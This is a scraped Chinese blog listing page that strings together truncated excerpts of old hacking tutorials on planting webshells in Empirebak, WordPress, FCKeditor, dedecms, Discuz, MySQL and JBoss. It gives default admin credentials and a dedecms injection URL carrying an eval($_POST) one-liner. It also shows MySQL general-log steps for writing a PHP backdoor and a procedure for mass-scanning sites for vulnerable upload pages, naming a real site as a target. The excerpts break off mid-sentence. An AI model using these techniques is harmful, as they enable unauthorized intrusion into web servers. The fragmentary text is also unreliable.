fhod 邪恶八进制帝国备份王(Empirebak)简介EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.可在 http://www.phome.net/ebak2008os/ 下载到默认账号密码为admin 123456登陆后先备份一次数据备份时可选择备份到的目录。。默认有个safemod当然也可以
转载
精选
2010-04-26 22:56:02
1088阅读
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
文章作者:fhod
帝国备份王(Empirebak)简介
EmpireBak是一款完全免费、专门为Mysql大数据的备份与导入而设计的软件,系统采用分卷备份与导入,理论上可备份任何大小的数据库.
可在 http://www.phome.net/ebak2008os/ 下载到
默认账号密码为
admin 
转载
精选
2011-01-24 19:49:59
1742阅读
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
wordpress拿WebShell
Simeon 安天365
&n
原创
2010-02-21 14:42:26
7786阅读
晚上和宝看个台湾的站,后台套用的是FCKeditor的系统.这貌似是个全世界都在用的编辑系统,什么韩国日本台湾美国的站都在用
再入侵的时候,宝发现的心得我记录下:
http://www.xxx.tw/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/
转载
2010-03-24 18:17:28
829阅读
需要工具:1,挖掘鸡 2,明小子旁注入工具,3,ASP站长助手。第一步:使用挖掘鸡工具扫描漏洞网站,关键词填:"动力" 添加后缀名:upfile_soft.asp点“开始” 接着点“检测结果” 稍等一会就有很多漏洞网站出来了,由于省时间,我这里已经找到了一个了。http://www.dnjk.com/upfile_soft.asp 是“东南健康网”第二步:打开明小子旁注
转载
精选
2006-03-23 01:06:14
3225阅读
2评论
dedecms 在禁止上传任何文件包括图片的时候 先把脚本木马成jpg然后传到另外一个站上 然后利用文章发布 直接填写上图片地址 提交 会自动把图片下载进服务器 然后利用更新首页 模板选择马的路径 更新为 .php 就是你的马。
转载
精选
2010-12-09 23:09:11
990阅读
1. dedecms方法 文件上传(分为图片上传或者文件管理器上传) 文件包含漏洞,在模块管理中将一句话插入到html的文件中(优先为文件主页) 也可以在核心设置中插入一句话,从而将一句话插入到data\config.cache.inc.php中。 2. 帝国cms方法(mpirecms) 该cms ...
转载
2021-08-19 13:41:00
574阅读
2评论
Burpsuite截断上传拿webshell 很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。然后找了篇大大写的Burpsiute截断上传拿webshell的科普帖看了看,然后去实践了一下。 在后台上传图片的地方添加xxx.jpg 图片 打开burpsiute进入proxy后进入options修改代理端口等然后
转载
精选
2014-11-17 11:19:19
1195阅读
四个版本的漏洞, Discuz! 6.0 、7.0、7.2和X1.5。
传X1.5出0day,最后神马也木见……后t00ls大牛淫们发出了方法和EXP,围观下。
——————————————
转载
精选
2011-04-01 15:20:49
2188阅读
一、直接上传获得
这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/p_w_picpaths/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文 件名是原来的文件名,bo-blog后台可以可以直接上传.php文
转载
精选
2012-03-20 16:13:00
628阅读
阿江统计拿WebShell
第一:
前提知道数据库路经,并且改成asp或asa后缀!阿江计数程序,可以通过
http://网站/stat.asp?style=text&referer=代码内容&screenwidth=1024
直接提交,即可把代码内容直接插入到计数系统的数据库中,而此系统默认数据库为count#.asa,我们可以通过http://
转载
2011-02-16 11:28:09
668阅读
mysql 3.x拿webshell先建表 字段 写入一句话查询导出一句话mysql> use mysqlDatabase changedmysql> Create TABLE demo (sanr text NOT NULL);Query OK, 0 rows affected (0.00 sec)mysql> Insert INTO demo (sanr) VALU
原创
2015-01-26 15:18:10
1236阅读
该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。前提:条件是root用户。思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之!要先把general log设置为ON然后将文件修改日志文件名修改。本来是在mysql下的一个
转载
2023-05-19 16:13:08
0阅读
JBoss是一个大型应用平台,普通用户很难接触到。越是难以接触到的东西越觉得高深,借用北京公交司机李素丽的一句话“用力只能干出称职,用心才能干出优秀”,在安全上也是如此,虽然JBoss平台很难掌握,但是只要找到Jboss的罩门,一样轻松渗透,本文就如何针对Jboss的一个漏洞来获取其Webshell
原创
2021-08-24 15:01:22
1914阅读
XSS漏洞XSS介绍XSS全程跨站脚本,是将任意JavaScript代码插入到Web用户页面里执行以达到攻击目的的漏洞,攻击者利用浏览器动态展示数据功能,在HTML页面嵌入恶意代码。当用户去浏览该页面时,这些嵌入在HTML中的恶意JS代码就会被执行,用户浏览器被攻击者控制,从而达到攻击者的攻击目的,如:利用XSS平台窃取Cookie信息、Beef操作用户浏览器等。XSS产生原理形成XSS漏洞的主要
转载
2024-03-09 21:55:23
74阅读
1、访问http://127.0.0.1/admin/global/global_templatesedit.aspx
?path=../tools/&filename=rss.aspx&templateid=1&templatename=D
转载
精选
2011-06-05 14:54:53
797阅读
前面所讲述的操作都非常简单,基本上没有什么太大的难度。可是进入了后台要获取Webshell就有点麻烦了,PHPBB旧版本还可以直接添加上传类型为PHP的文件,然后直接上传PHP的后门得到Webshell。可是,最新版本的PHPBB后台已经不允许添加上传类型了,如图5。
图5
可以利用的基本上都限制了,经测试发现部分空间可以添加inc扩展名,然后前台发帖上传扩展为inc的PHP后门程
转载
精选
2007-12-10 12:39:00
2822阅读
Burpsuite截断上传拿webshell 很多大大都在用burpsiute,大大们说这个工具的功能有很多很多,小菜我也不知到底是些什么。然后找了篇大大写的Burpsiute截断上传拿webshell的科普帖看了看,然后去实践了一下。 在后台上传图片的地方添加xxx.jpg 图片 打开burpsiute进入proxy后进入options修改代理端口等然后
转载
精选
2014-11-17 11:11:51
1706阅读
点赞
文章作者:udb311
转载请注明:http://www.hackline.net/
1、注入漏洞
存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
http://localhost
转载
精选
2011-01-04 14:04:07
1238阅读
时间:2014-04-16 11:22 来源:阳光在线下载标签:js6899.com一、直接上传获得webshell这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/p_w_picpaths/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可
转载
精选
2014-04-10 19:52:39
4378阅读